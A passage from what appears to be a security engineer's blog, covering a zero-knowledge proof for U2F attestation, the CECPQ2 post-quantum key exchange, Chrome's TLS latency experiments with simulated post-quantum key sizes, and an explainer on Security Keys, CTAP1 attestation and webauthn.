After that, the elliptic curve operation itself is pretty easy. Using the formulae from “Complete addition formulas for prime order elliptic curves” (Renes, Costello, and Batina) it takes 5365 multiplication nodes to do a 4-tooth comb scalar-mult with a secret scalar and a secret point. Then a final 17 multiplication nodes add in the public base-point multiple, supply the inverse to convert to affine form, and check that the resulting x-coordinate matches the original r value. The circuit does not reduce the x-coordinate mod n in order to save work: for P-256, that means that around one in 2¹²⁸ signatures may be incorrectly rejected, but that's below the noise floor of arithmetic errors in CPUs. Perhaps if this were to be used in the real world, that would be worth doing correctly, but I go back to work tomorrow so I'm out of time.

In total, the full circuit contains 7534 multiplication nodes, 2154 secret inputs, and 17 236 constraints.

(Pratyush Mishra points out that affine formulae would be more efficient than projective since inversion is cheap in this model. Oops!)

Implementation

My tool for generating the matrices that Bulletproofs operate on outputs 136KB of LZMA-compressed data for the circuit described above. In some contexts, that amount of binary size would be problematic, but it's not infeasible. There is also quite a lot of redundancy: the data includes instructions for propagating the secret inputs through the arithmetic circuit, but it also includes matrices from which that information could be derived.

The implementation is based on BoringSSL's generic-curve code. It doesn't even use Shamir's trick for multi-scalar multiplication of curve points, it doesn't use Montgomery form in a lot of places, and it doesn't use any of the optimisations described in the Bulletproofs paper. In short, the following timings are extremely pessimistic and should not be taken as any evidence about the efficiency of Bulletproofs. But, on a 4GHz Skylake, proving takes 18 seconds and verification takes 13 seconds. That's not really practical, but there is a lot of room for optimisation and for multiple cores to be used concurrently.

The proof is 70 450 bytes, dominated by the 2154 secret-input commitments. That's not very large by the standards of today's web pages. (And Dan Boneh points out that I should have used a vector commitment to the secret inputs, which would shrink the proof down to just a few hundred bytes.)

Intermediates and FIDO2

One important limitation of the above is that it only handles one level of signatures. U2F allows an intermediate certificate to be provided so that only less-frequently-updated roots need to be known a priori. With support for only a single level of signatures, manufacturers would have to publish their intermediates too. (But we already require that for the WebPKI.)

Another issue is that it doesn't work with the updated FIDO2 standard. While only a tiny fraction of Security Keys are FIDO2-based so far, that's likely to increase. With FIDO2, the model of the device is also included in the signed message, so the zero-knowledge proof would also have to show that a SHA-256 preimage has a certain structure. While Bulletproofs are quite efficient for implementing elliptic curves, a binary-based algorithm like SHA-256 is quite expensive: the Bulletproofs paper notes a SHA-256 circuit using 25 400 multiplications. There may be a good solution in combining different zero-knowledge systems based on “Efficient Zero-Knowledge Proof of Algebraic and Non-Algebraic Statements with Applications to Privacy Preserving Credentials” (Chase, Ganesh, Mohassel), but that'll have to be future work.

Happy new year.

CECPQ2

CECPQ1 was the experiment in post-quantum confidentiality that my colleague, Matt Braithwaite, and I ran in 2016. It's about time for CECPQ2.

I've previously written about the experiments in Chrome which lead to the conclusion that structured lattices were likely the best area in which to look for a new key-exchange mechanism at the current time. Thanks to the NIST process we now have a great many candidates to choose from in that space. While this is obviously welcome, it also presents a problem: the fitness space of structured lattices looks quite flat so there's no obviously correct choice. Would you like keys to be products (RLWE) or quotients (NTRU; much slower key-gen, but subsequent operations are faster; older, more studied)? Do you want the ring to be NTT-friendly (fast multiplication, but more structure), or to have just a power-of-two modulus (easy reduction), or to have as little structure as possible? What noise profile and failure probability? Smart people can reasonably end up with different preferences.

This begs the question of why do CECPQ2 now at all? In some number of years NIST will eventually whittle down the field and write standards. Adrian Stanger of the NSA said at CRYPTO this year that the NSA is looking to publish post-quantum standards around 2024, based on NIST's output. (And even said that they would be pure-PQ algorithms, not combined with an elliptic-curve operation as a safeguard.) So if we wait five years things are likely to be a lot more settled.

Firstly, you might not be happy with the idea of waiting five years if you believe Michele Mosca's estimate of a one sixth chance of a large quantum computer in ten years. More practically, as we sail past the two year mark of trying to deploy TLS 1.3, another concern is that if we don't exercise this ability now we might find it extremely difficult to deploy any eventual design.

TLS 1.3 should have been straightforward to deploy because the TLS specs make accommodations for future changes. However, in practice, we had to run a series of large-scale experiments to measure what patterns of bytes would actually weave through all the bugs in the TLS ecosystem. TLS 1.3 now has several oddities in the wire-format that exist purely to confuse various network intermediaries into working. Even after that, we're still dealing with issues. Gallingly, because we delayed our server deployment in order to ease the client deployment, we're now having to work around bugs in TLS 1.3 client implementations that wouldn't have been able to get established had we quickly and fully enabled it.

The internet is very large and it's not getting any easier to steer. So it seems dangerous to assume that we can wait for a post-quantum standard and then deploy it. Any CECPQ2 is probably, in the long-term, destined to be replaced. But by starting the deployment now it can hopefully make that replacement viable by exercising things like larger TLS messages. Also, some practical experience might yield valuable lessons when it comes to choosing a standard. If the IETF had published the TLS 1.3 RFC before feedback from deployment, it would have been a divisive mess.

CECPQ2 Details

At the time of CECPQ1, the idea of running both a post-quantum and elliptic-curve primitive concurrently (to ensure that even if the post-quantum part was useless, at least the security wasn't worse than before) wasn't universally embraced. But we thought it important enough to highlight the idea in the name: combined elliptic-curve and post-quantum. It's a much more widely accepted idea now and still makes sense, and the best choice of elliptic-curve primitive hasn't changed, so CECPQ2 is still a combination with X25519.

As for the post-quantum part, it's based on the HRSS scheme of Hülsing, Rijneveld, Schanck, and Schwabe. This is an instantiation of NTRU, the patent for which has expired since we did CECPQ1. (The list of people who've had a hand in NTRU is quite long. See the Wikipedia page for a start.)

Last year Saito, Xagawa, and Yamakawa (SXY) published a derivative of HRSS with a tight, QROM-proof of CCA2 security from an assumption close to CPA security. It requires changes (that slow HRSS down a little), but HRSS+SXY is currently the basis of CECPQ2. Since HRSS+SXY no longer requires an XOF, SHAKE-128 has been replaced with SHA-256.

Having said that it's hard to choose in the structured lattice space, obviously HRSS is a choice and there were motivations behind it:

  1. CCA2-security is worthwhile, even though TLS can do without. CCA2 security roughly means that a private-key can be used multiple times. The step down is CPA security, where a private-key is only safe to use once. NewHope, used in CECPQ1, was only CPA secure and that worked for TLS since its confidentiality keys are ephemeral. But CPA vs CCA security is a subtle and dangerous distinction, and if we're going to invest in a post-quantum primitive, better it not be fragile.
  2. Avoiding decryption failures is attractive. Not because we're worried about unit tests failing (hardware errors set a noise floor for that anyway), but because the analysis of failure probabilities is complex. In the time since we picked HRSS, a paper has appeared chipping away at these failures. Eliminating them simplifies things.
  3. Schemes with a quotient-style key (like HRSS) will probably have faster encap/decap operations at the cost of much slower key-generation. Since there will be many uses outside TLS where keys can be reused, this is interesting as long as the key-generation speed is still reasonable for TLS.
  4. NTRU has a long history. In a space without a clear winner, that's a small positive.

CECPQ2 will be moving slowly: It depends on TLS 1.3 and, as mentioned, 1.3 is taking a while. The larger messages may take some time to deploy if we hit middlebox- or server-compatibility issues. Also the messages are currently too large to include in QUIC. But working though these problems now is a lot of the reason for doing CECPQ2—to ensure that post-quantum TLS remains feasible.

Lastly, I want to highlight that this only addresses confidentiality, not authenticity. Confidentiality is more pressing since it can be broken retrospectively, but it's also much easier to deal with in TLS because it's negotiated independently for every connection. Post-quantum authenticity will be entangled with the certificate and CA ecosystem and thus will be significantly more work.

Post-quantum confidentiality for TLS

In 2016, my colleague, Matt Braithwaite, ran an experiment in Google Chrome which integrated a post-quantum key-agreement primitive (NewHope) with a standard, elliptic-curve one (X25519). Since that time, the submissions for the 1st round of NIST’s post-quantum process have arrived. We thus wanted to consider which of the submissions, representing the new state of the art, would be most suitable for future work on post-quantum confidentiality in TLS.

A major change since the 2016 experiment is the transition from TLS 1.2 to TLS 1.3 (a nearly-final version of which is now enabled by default in Chrome). This impacts where in the TLS handshake the larger post-quantum messages appear:

In TLS 1.2, the client offers possible cipher suites in its initial flow, the server selects one and sends a public-key in its reply, then the client completes the key-agreement in its second flow. With TLS 1.3, the client offers several possible public-keys in its initial flow and the server completes one of them in its reply. Thus, in a TLS 1.3 world, the larger post-quantum keys will be sent to every TLS server, whether or not they’ll use it.

(There is a mechanism in TLS 1.3 for a client to advertise support for a key-agreement but not provide a public-key for it. In this case, if the server wishes to use that key-agreement, it replies with a special message to indicate that the client should try again and include a public-key because it’ll be accepted. However, this obviously adds an extra round-trip and we don’t want to penalise more secure options—at least not if we want them adopted. Therefore I’m assuming here that any post-quantum key agreement will be optimistically included in the initial message. For a diagram of how this might work with a post-quantum KEM, see figure one of the Kyber paper. Also I'm using the term “public-key” here in keeping with the KEM constructions of the post-quantum candidates. It's not quite the same as a Diffie-Hellman value, but it's close enough in this context.)

In order to evaluate the likely latency impact of a post-quantum key-exchange in TLS, Chrome was augmented with the ability to include a dummy, arbitrarily-sized extension in the TLS ClientHello. To be clear: this was not an implementation of any post-quantum primitive, it was just a fixed number of bytes of random noise that could be sized to simulate the bandwidth impact of different options. It was included for all versions of TLS because this experiment straddled the enabling of TLS 1.3.

Post quantum families

Based on submissions to NIST’s process, we grouped likely candidates into three “families” of algorithms, based on size: supersingular isogenies (SI), structured lattices (SL), and unstructured lattices (UL). Not all submissions fit into these families, of course: in some cases the public-key + ciphertext size was too large to be viable in the context of TLS, and others were based on problems that we were too unfamiliar with to be able to evaluate.

As with our 2016 experiment, we expect any post-quantum algorithm to be coupled with a traditional, elliptic-curve primitive so that, if the post-quantum component is later found to be flawed, confidentiality is still protected as well as it would otherwise have been.

This led to the following, rough sizes for evaluation:

  1. Supersingular isogenies (SI): 400 bytes
  2. Structured lattices (SL): 1 100 bytes
  3. Unstructured lattices (UL): 10 000 bytes

Incompatibilities with unstructured lattices

Before the experiment began, in order to establish some confidence that TLS connections wouldn’t break, the top 2 500 sites from the Alexa list were probed to see whether large handshakes caused problems. Unfortunately, the 10 000-byte extension caused 21 of these sites to fail, including common sites such as godaddy.com, linkedin.com, and python.org.

Oddly enough, reducing the size of the extension to 9 999 bytes reduced that number to eight, but linkedin.com was still included. These remaining eight sites seem to reject ClientHello messages larger than 3 970 bytes.

This indicated that widespread testing of a 10 000-byte extension was not viable. Thus the unstructured lattice configuration was replaced with a 3 300-byte “unstructured lattice stand-in” (ULS). This size was chosen to be about as large as we could reasonably test (although four sites still broke.

Phase One

In February 2018, a fraction of Chrome installs (Canary and Dev channels only) were configured to enable the dummy extension in one of four sizes, with the configuration randomly selected, per install, from:

  1. Control group: no extension sent
  2. Supersingular isogenies (SI): 400 bytes
  3. Structured lattices (SL): 1 100 bytes
  4. Unstructured lattice standing (ULS): 3 300 bytes

We measured TLS handshake latency at the 50th and 95th percentile, split out by mobile / non-mobile and by whether the handshake was a full or resumption handshake.

Given that we measured a stand-in for the UL case, we needed to extrapolate from that to an estimate for the UL latency. We modeled a linear cost of each additional byte in the handshake, 66 bytes of overhead per packet, and an MTU around 1 500 bytes. The number of packets for the UL case is the same for MTU values around 1 500, but the number of packets for the SL case is less certain: a session ticket could push the ClientHello message into two packets there. We chose to model the SL case as a single packet for the purposes of estimating the UL cost.

We also ignored the possibility that the client’s initial congestion window could impact the UL case. If that were to happen, a UL client would have to wait an additional round-trip, thus our UL estimates might be optimistic.

Despite the simplicity of the model, the control, SI, and SL points for the various configurations are reasonably co-linear under it and we draw the least-squares line out to 10 000 bytes to estimate the UL latency.

Configuration Additional latency over control group
SI SL UL (estimated)
Desktop, Full, Median 4.0% 6.4% 71.2%
Desktop, Full, 95% 4.7% 9.6% 117.0%
Desktop, Resume, Median 4.3% 12.5% 118.6%
Desktop, Resume, 95% 5.2% 17.7% 205.1%
Mobile, Full, Median -0.2% 3.4% 34.3%
Mobile, Full, 95% 0.5% 7.2% 110.7%
Mobile, Resume, Median 0.6% 7.2% 66.7%
Mobile, Resume, 95% 4.2% 12.5% 149.5%

(The fact that one of the SI values came out implausibly negative should give some feeling for the accuracy of the results—i.e. the first decimal place is probably just noise, even at the median.)

As can be seen, the estimated latency overhead of unstructured lattices is notably large in TLS, even without including the effects of the initial congestion window. For this reason, we feel that UL primitives are probably not preferable for real-time TLS connections.

It is also important to note that, in a real deployment, the server would also have to return a message to the client. Therefore the transmission overhead, when connecting to a compatible server, would be doubled. This phase of the experiment experiment did not take that into account at all. Which leads us to…

Phase Two

In the second phase of the experiment we wished to measure the effect of actually negotiating a post-quantum primitive, i.e. when both client and server send post-quantum messages. We again added random noise of various sizes to simulate the bandwidth costs of this. Cloudflare and Google servers were augmented to echo an equal amount of random noise back to clients that included it.

In this phase, latencies were only measured when the server echoed the random noise back so that the set of measured servers could be equal between control and experiment groups. This required that the control group send one byte of noise (rather than nothing).

Since unstructured lattices were not our focus after the phase one results, there were only three groups in phase two: one byte (control), 400 bytes (SI), and 1100 bytes (SL).

Unlike phase one, we did not break the measurements out into resumption / full handshakes this time. We did that in phase one simply because that’s what Chrome measures by default. However, it begs the question of what fraction of handshakes resume, since that value is needed to correctly weigh the two numbers. Thus, in phase two, we simply measured the overall latency, with resumption (or not) implicitly included.

Here are the latency results, this time in milliseconds in order to reason about CPU costs below:

Configuration Additional latency over control group (ms)
SI SL
Mobile, Median 3.5 9.6
Mobile, 95% 18.4 159.0
Desktop, Median 2.6 5.5
Desktop, 95% 19.2 136.9

So far we’ve only talked about families of algorithms but, to analyse these results, we have to be more specific. That’s easy in the case supersingular isogenies (SI) because there is only one SI-based submission to NIST: SIKE.

For SIKEp503, the paper claims an encapsulation speed on a 3.4GHz Skylake of 16 619 kilocycles, or 4.9ms of work on a server. They also report on an assembly implementation for Aarch64, which makes a good example client. There the key generation + decapsulation time is 86 078 kilocycles, or 43ms on their 2GHz Cortex-A79.

On the other hand, structured lattices (SL) are much faster. There are several candidates here but most have comparable speed, and it’s under a 10th of a millisecond on modern Intel chips.

Therefore, if computation were included, the SI numbers above would have 48ms added to them. That happens to makes SL clearly faster at the median, although it does not close the gap at the 95% level. (The SI key-generation could be amortised across connections, at the cost of code complexity and maybe some forward security. Amortising key-generation across 16 connections results in 28ms of computation per connection, which doesn’t affect the argument.)

We had previously deployed CECPQ1 (X25519 + NewHope) in TLS, which should be comparable to SL measurements, and gotten quite different results: we found a 1ms increase at the median and only 20ms at 95%. (And CECPQ1 took roughly 1 900 bytes.)

On a purely technical level, CECPQ1 was based on TLS 1.2 and therefore increased the sizes of the server’s first flow and the client’s second flow. It’s possible that bytes in the client’s second flow are less expensive, but much more significantly, TLS 1.2 does not do a fresh key-agreement for a resumption handshake. Therefore all the successful resumptions had no overhead with CECPQ1, but with TLS 1.3, they would. Going back to historical Chrome statistics from the time of the CECPQ1 experiment, we estimate that about 50% of connections would have been resumptions, which closes the gap.

Additionally, there may be a significant difference in Chrome user populations between the experiments. CECPQ1 went to Chrome Stable (non-mobile only) while the post-quantum measurements here have been done on Dev and Canary channels. It is the case that, for all non-mobile TLS connections (completely unrelated to any post-quantum experiments), the population of Dev and Canary channel users see higher TLS latencies and the effect is larger than the SI or SL effect measured above. Thus the user population for these experiments might have had poorer internet connections than the population for CECPQ1, exaggerating the costs of extra handshake bytes.

Apart from CPU time, a second major consideration is that we are not comparing like with like. Our 400-byte figure for SI maps to a NIST “category one” strength, while 1 100 bytes for SL is roughly in line with “category three”. A comparable, “category one” SL primitive comes in at more like 800 bytes, while a “category three” SI is much slower.

(Although there is a recent paper suggesting that SIKEp503 might be more like category three after all. So maybe this point is moot, but such gyrations highlight that SI is a relatively new field of study.)

Lastly, and much more qualitatively, we have had many years of dealing with subtle bugs in elliptic-curve implementations. The desire for performance pushes for carefully-optimised implementations, but missed carries, or other range violations, are typically impossible for random tests to find. After many years, we are at the point where we are starting to use formally-synthesised code for elliptic-curve field operations but SI would take us deeper into the same territory, likely ensuring that the pattern of ECC bugs continues into the future. (As Hamburg says in his NIST submission, “some cryptographers were probably hoping never to see a carry chain again”.)

On the other hand, SL designs are much more like symmetric primitives, using small fields and bitwise operations. While it’s not impossible to botch, say, AES, my experience is that the defect rates in implementations of things like AES and SHA-256 is dramatically lower, and this is strong argument for SL over SI. Combining post-quantum primitives with traditional ECC is a good defense against bugs, but we should still be reticent to adopt potentially fragile constructs.

(Not all SL designs have this benefit, mind you. Hamburg, quoted above, uses ℤ/(23120 - 21560 - 1) in ThreeBears and lattice schemes for other primitives may need operations like discrete Gaussian sampling. But it holds for a number of SL-based KEMs.)

Thus the overall conclusion of these experiments is that post-quantum confidentiality in TLS should probably be based on structured lattices although there is still an open question around QUIC, for which exceeding a single packet is problematic and thus the larger size of SL is more significant.

Security Keys

Introduction

Predictions of, and calls for, the end of passwords have been ringing through the press for many years now. The first instance of this that Google can find is from Bill Gates in 2004, although I suspect it wasn’t the first.

None the less, the experience of most people is that passwords remain a central, albeit frustrating, feature of their online lives.

Security Keys are another attempt address this problem—initially in the form of a second authentication factor but, in the future, potentially as a complete replacement. Security Keys have gotten more traction than many other attempts to solve this problem and this post exists to explain and, to some extent, advocate for them to a technical audience.

Very briefly, Security Keys are separate pieces of hardware capable of generating public/private key pairs and signing with them. By being separate, they can hopefully better protect those keys than a general purpose computer can, and they can be moved between devices to serve as a means of safely authorising multiple devices. Most current examples attach via USB, but NFC and Bluetooth devices also exist.

Contrasts with existing solutions

Security Keys are not the first attempt at solving the problems of passwords, but they do have different properties than many of the other solutions.

One common form of second factor authentication is TOTP/HOTP. This often takes the form of an app on the user’s phone (e.g. Google Authenticator) which produces codes that change every minute or so. It can also take the form of a token with an LCD display to show such codes (e.g. RSA SecurID).

These codes largely solve the problem of password reuse between sites as different sites have different seed values. Thus stealing the password (and/or seed) database from one site no longer compromises accounts at other sites, as is the case with passwords.

However, these codes are still phishable: the user may be tricked into entering their password and code on a fake site, which can promptly forward them to the real site and impersonate the user. The codes may also be socially engineered as they can be read over the phone etc by a confused user.

Another common form of second factor authentication are SMS-delivered codes. These share all the flaws of HOTP/TOTP and add concerns around the social engineering of phone companies to redirect messages and, in extreme cases, manipulation of the SS7 network.

Lastly, many security guides advocate for the use of password managers. These, if used correctly, can also solve the password reuse problem and significantly help with phishing, since passwords will not be auto-filled on the wrong site. Thus this is sound advice and, uniquely amongst the solutions discussed here, can be deployed unilaterally by users.

Password managers, however, do not conveniently solve the problem of authenticating new devices, and their automated assistance is generally limited to a web context. They also change a password authentication from an (admittedly weak) verification of the user, to a verification of the device; an effect which has provoked hostility and counter-measures from relying parties.

In light of this, Security Keys should be seen as a way to improve upon, and exceed the abilities of, password managers in a context where the relying party is cooperating and willing to make changes. Security Keys are unphishable to a greater extent than password managers because credentials are bound to a given site, plus it’s infeasible to socially engineer someone to read a binary signature over the phone. Also, like TOTP/HOTP, they use fresh credentials for each site so that no reuse is possible. Unlike password managers, they can work outside of a web context and they can serve to authenticate new devices.

They aren’t magic, however. The unphishability of Security Keys depends on the extent to which the user may be mislead into compromising other aspects of their device. If the user can be tricked into installing malware, it could access the Security Key and request login signatures for arbitrary sites. Also, malware may compromise the user’s login session in a browser after successfully authenticating with a Security Key. Still, that’s a heck of a lot better than the common case of people using the same password across dozens of sites.

All the different terms

There is a lot of terminology specific to this topic. The first of which I’ve already used above: “relying parties”. This term refers to any entity trying to authenticate a user. When logging into a website, for example, the website is the relying party.

The FIDO Alliance is a group of major relying parties, secure token manufacturers, and others which defines many of the standards around Security Keys. The term that FIDO uses for Security Keys is “Universal 2nd factor” (U2F) so you’ll often see “U2F security key” used—it’s talking about the same thing. The terms “authenticator” and “token” are also often used interchangeably to refer to these devices.

At the time of writing, all Security Keys are based version one of FIDO’s “Client To Authenticator Protocol” (CTAP1). This protocol is split between documentation of the core protocol and separate documents that describe how the core protocol is transported over USB, NFC, and Bluetooth.

FIDO also defines a U2F Javascript API for websites to be able to interact with and use Security Keys. However, no browser ever implemented that API prior to a forthcoming (at the time of writing) version of Firefox.

But sites have been able to use Security Keys with Google Chrome for some years because Chrome ships with a hidden, internal extension through which the U2F API can be implemented with a Javascript polyfill, which Google also provides. (Extensions for Firefox were also available prior to native support in that browser.)

Thus all sites which supported Security Keys prior to 2018 used some polyfill in combination with Chrome’s internal extension, or one of the Firefox extensions, to do so.

The FIDO Javascript API is not the future, however. Instead, the W3C is defining an official Web Authentication standard for Security Keys, which is commonly called by its short name “webauthn”. This standard is significantly more capable (and significantly more complex) than the U2F API but, by the end of 2018, it is likely that all of Edge, Chrome, and Firefox will support it by default.

The webauthn standard has been designed to work with existing (CTAP1-based) devices, but FIDO is working on an updated standard for tokens, CTAP2, which will allow them to take advantage of the new capabilities in webauthn. (The standards were co-developed so it’s equally reasonable to see it from the other direction and say that webauthn allows browsers to take advantage of the new capabilities in CTAP2.)

There are no CTAP2 devices on the market yet but their major distinguishing feature will be that they can be used as a 1st (and only) factor. I.e. they have enough internal storage that they can contain a username and so both provide an identity and authenticate it. This text will mostly skim over CTAP2 since the devices are not yet available. But developers should keep it in mind when dealing with webauthn as it explains many, otherwise superfluous, features in that standard.

CTAP1 Basics

Since all current Security Keys use CTAP1, and webauthn is backwards compatible with it, understanding CTAP1 is pretty helpful for understanding the space in general. Here I’ll include some Python snippets for communicating with USB CTAP1 devices to make things concrete, although I’ll skip over everything that deals with framing.

CTAP1 defines two operations: creating a new key, and signing with an existing key. I’ll focus on them in turn.

Creating a new key

This operation is called “registration“ in CTAP1 terminology and it takes two, 32-byte arguments: a “challenge” and an “application parameter”. From the point of view of the token these arguments are opaque byte strings, but they’re intended to be hashes and the hash function has to be SHA-256 if you want to interoperate.

The challenge argument, when used with a web browser, ends up being the hash of a JSON-encoded structure that includes a random nonce from the relying party as well as other information. This nonce is intended to prove freshness: if it was signed by the newly generated key then the relying party could know that the key really was fresh and that this was the only time it had been registered. Unfortunately, CTAP1 doesn’t include any self-signature (and CTAP2 devices probably won’t either). Instead the situation is a lot more complex, which we’ll get to.

The application parameter identifies a relying party. In U2F it’s a hash of the origin (e.g. SHA-256(“https://example.com”)) while in webauthn it’s a hash of the domain (e.g. SHA-256(“example.com”)). As we’ll see, the signing operation also takes an application parameter and the token checks that it’s the same value that was given when the key was created. A phishing site will operate on a look-alike domain, but when the browser hashes that domain, the result will be different. Thus the application parameter sent to the token will be different and the token will refuse to allow the key to be used. Thus keys are bound to specific origins (or, with webauthn, domains) and cannot be used outside of that context.

Here’s some sample code that’ll shine some light on other aspects of the protocol, including the outputs from key creation:

(The full source is available if you want to play with it, although it’ll only work on Linux.)

The first thing to note is that the operation runs in a loop. CTAP1 devices require a “user presence” test before performing operations. In practice this means that they’ll have a button or capacitive sensor that you have to press. While the button/sensor isn’t triggered, operations return a specific error code and the host is expected to retry the operation after a brief delay until it succeeds.

A user-presence requirement ensures that operations cannot happen without a human being physically present. This both stops silent authentication (which could be used to track people) and it stops malware from silently proxying requests to a connected token. (Although it doesn’t stop malware from exploiting a touch that the user believes is authorising a legitimate action.)

Once the operation is successful, the response can be parsed. In the spirit of short example code everywhere, errors aren’t checked, so don’t use this code for real.

Key generation, of course, produces a public key. For CTAP1 tokens, that key will always be an uncompressed, X9.62-encoded, ECDSA P-256 public key. That encoding happens to always be 65 bytes long.

After that comes the key handle. This is an opaque value that the token uses to identify this key, and this evinces another important facet of CTAP1: the tokens are nearly stateless in practice.

In theory, the key handle could be a small identifier for a key which is stored on the device. In practice, however, the key handle is always an encrypted version of the private key itself (or a generating seed). This allows storage of the keys to be offloaded to the relying party, which is important for keeping token costs down.

This also means that CTAP1 tokens cannot be used without the user entering a username. The relying party has to maintain a database of key handles, and that database has to be indexed by something. This is changing with CTAP2, but I’ll not mention that further until CTAP2 tokens are being commercially produced.

Lastly, there’s the attestation certificate (just one; no chain) and a signature. As I mentioned above, the signature is sadly not from the newly created key, but from a separate attestation private key contained in the token. This’ll be covered in a later section

Signing with a key

Once a key has been created, we can ask the token to sign with it.

Again, a “challenge” and “application parameter” have to be given, and they have the same meaning and format as when creating a key. The application parameter has to be identical to the value presented when the key was created otherwise the token will return an error.

The code looks very similar:

The same pattern for waiting for a button press is used: the token is polled and returns an error until the button/sensor is pressed.

Three values are returned: a flag confirming that the button was pressed, a signature counter, and the signature itself—which signs over the challenge, application parameter, flags, and counter.

In the web context, the challenge parameter will be the hash of a JSON structure again, and that includes a nonce from the relying party. Therefore, the relying party can be convinced that the signature has been freshly generated.

The signature counter is a strictly monotonic counter and the intent is that a relying party can record the values and so notice if a private key has been duplicated, as the strictly-monotonic property will eventually be violated if multiple, independent copies of the key are used.

There are numerous problems with this, however. Firstly, recall that CTAP1 tokens have very little state in order to keep costs down. Because of that, all tokens that I’m aware of have a single, global counter shared by all keys created by the device. (The only exception I’ve seen is the Bluink key because it keeps state on a phone.) This means that the value and growth rate of the counter is a trackable signal that’s transmitted to all sites that the token is used to login with. For example, the token that I’m using right now has a counter of 431 and I probably use it far more often than most because I’m doing things like writing example Python code to trigger signature generation. I’m probably pretty identifiable because of that.

A signature counter is also not a very effective defense, especially if it’s per-token, not per-key. Security Keys are generally used to bless long-term logins, and an attacker is likely to be able to login once with a cloned key. In fact, the login that violates the monotonicity of the counter will probably be a legitimate login so relying parties that strictly enforce the requirement are likely to lock the real user out after a compromise.

Since the counter is almost universally per-token, that means that it’ll commonly jump several values between logins to the same site because the token will have been used to login elsewhere in-between. That makes the counter less effective at detecting cloning. If login sessions are long-lived, then the attacker may only need to sign once and quite possibly never be detected. If an attacker is able to observe the evolution of the counter, say by having the user login to an attacker-controlled site periodically, they can avoid ever triggering a counter regression on a victim site.

Finally, signature counters move the threat model from one that deals with phishing and password reuse, to one where attackers are capable of extracting key material from hardware tokens. That’s quite a change and the signature counter is not optional in the protocol.

Attestation

When creating a key we observed that the token returned a certificate, and a signature over the newly created key by that certificate. Here’s the certificate from the token that I happen to be using as I write this:

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 95815033 (0x5b60579)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = Yubico U2F Root CA Serial 457200631
        Validity
            Not Before: Aug  1 00:00:00 2014 GMT
            Not After : Sep  4 00:00:00 2050 GMT
        Subject: CN = Yubico U2F EE Serial 95815033
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (256 bit)
                pub:
                    04:fd:b8:de:b3:a1:ed:70:eb:63:6c:06:6e:b6:00:
                    69:96:a5:f9:70:fc:b5:db:88:fc:3b:30:5d:41:e5:
                    96:6f:0c:1b:54:b8:52:fe:f0:a0:90:7e:d1:7f:3b:
                    ff:c2:9d:4d:32:1b:9c:f8:a8:4a:2c:ea:a0:38:ca:
                    bd:35:d5:98:de
                ASN1 OID: prime256v1
                NIST CURVE: P-256
        X509v3 extensions:
            1.3.6.1.4.1.41482.2:
                1.3.6.1.4.1.41482.1.1
    Signature Algorithm: sha256WithRSAEncryption

Clearly, it identifies the manufacturer and the unknown extension in there identifies the exact model of the key.

The certificate, despite the 32-bit serial number, doesn’t uniquely identify the device. The FIDO rules say that at least 100 000 other devices should share the same certificate. (Some devices mistakenly shipped with uniquely identifying attestation certifications. These will be recognised and suppressed in Chrome 67.) This device happens to be a special, GitHub-branded one. I don’t know whether this attestation certificate is specific to that run of devices, but the same model of device purchased on Amazon around the same time (but unbranded) had a different certificate serial number, so maybe.

But the practical upshot is that a relying party can determine, with some confidence, that a newly created key is stored in a Yubico 4th-gen U2F device by checking the attestation certificate and signature. That fact should cause people to pause; it has weighty ramifications.

Traditionally, anyone who implemented the various specifications that make up a web browser or server has been an equal participant in the web. There’s never been any permission needed to create a new browser or server and, although the specifications on the client side are now so complex that implementing them is a major effort, it’s possible to leverage existing efforts and use WebKit, Firefox, or Chromium as a base.

(The DRM in Encrypted Media Extensions might be an exception, and there was an appropriately large fight over that. I’m not making any judgment about the result of that here though.)

But with attestation, it’s quite possible for a site to require that you have particular hardware if you want to use webauthn. The concerns about that vary depending on the context: for an internal, corporate site to demand employees use particular hardware seems unobjectionable; a large public site raises many more concerns. There appear to be two, main ways in which this could develop in an unhealthy direction:

Firstly, as we’ve experienced with User-Agent headers, sites are not always as responsive as we would like. User-Agent headers have layers upon layers of browsers spoofing other browsers—the history of browser development is written in there—all because of this. Spoofing was necessary because sites would implement workarounds or degraded experiences for some browsers but fail to update things as the browser landscape changed. In order to be viable, each new browser entrant had to spoof the identity of the currently dominant one.

But attestation is not spoofable. Therefore, if sites launch webauthn support and accept attestations from the current set of token vendors, future vendors may be locked out of the market: Their devices won’t work because their attestations aren’t trusted, and they won’t be able to get sites to update because they won’t have enough market presence to matter.

If things get really bad, we may see a market develop where attestation certificates are traded between companies to overcome this. The costs of that are ultimately borne by increased token prices, which users have to pay.

The second concern is that, if different sites adopt different policies, users can have no confidence that a given token will work on a given site. They may be forced to have multiple tokens to span the set of sites that they use, and to remember in each case which token goes with which site. This would substantially degrade the user experience.

FIDO does not dismiss these worries and their answer, for the moment, is the metadata service (MDS). Essentially this is a unified root store that all sites checking attestation are supposed to use and update from. That would solve the problem of site stagnation by creating a single place for new vendors to submit their roots which would, in theory, then auto-update everywhere else. It would also help with the problem of divergent policies because it includes a FIDO-specified security-level for each type of token, which would at least reduce the variety of possible policies and make them more understandable—if used.

The challenge at the moment is that major vendors are not even included in the MDS, and using the MDS properly is harder for sites than throwing together a quick hack that’ll be “good enough for now”.

Thus my advice is for sites to ignore attestation if you’re serving the public. As we’ll see when we cover the webauthn API, attestation information is not even provided by default. Sites newly supporting webauthn are probably just using passwords, or maybe SMS OTP, and thus Security Keys offer a clear improvement. Worrying about whether the Security Key is a physical piece of hardware, and what certifications it has, is a distraction.

webauthn

Now that we understand the underlying protocol, here’s how to actually use it. As mentioned above, there’s an older, “U2F” API but that’ll disappear in time and so it’s not covered here. Rather, the future is the W3C Web Authentication API, which builds on the Credential Management API.

Right now, if you want to experiment, you can use Firefox Nightly, Chrome Canary, or Edge 14291+. In Firefox Nightly, things should be enabled by default. For Chrome Canary, run with –enable-features=WebAuthentication –enable-experimental-web-platform-features. For Edge, I believe that you have to enable it in about:flags, but I’m just going off documentation.

Testing for support

Before trying to use webauthn, you should use feature detection to ensure that it’s supported by a given browser:

Creating a new key

The following are partial snippets of Javascript for creating a key. In-between the snippets is discussion so you would need to concatenate all the snippets in this section to get a complete example.

The name field is required, but currently discarded. In the future it’s intended that CTAP2 tokens will be able to store this and so it could be used in an account chooser interface.

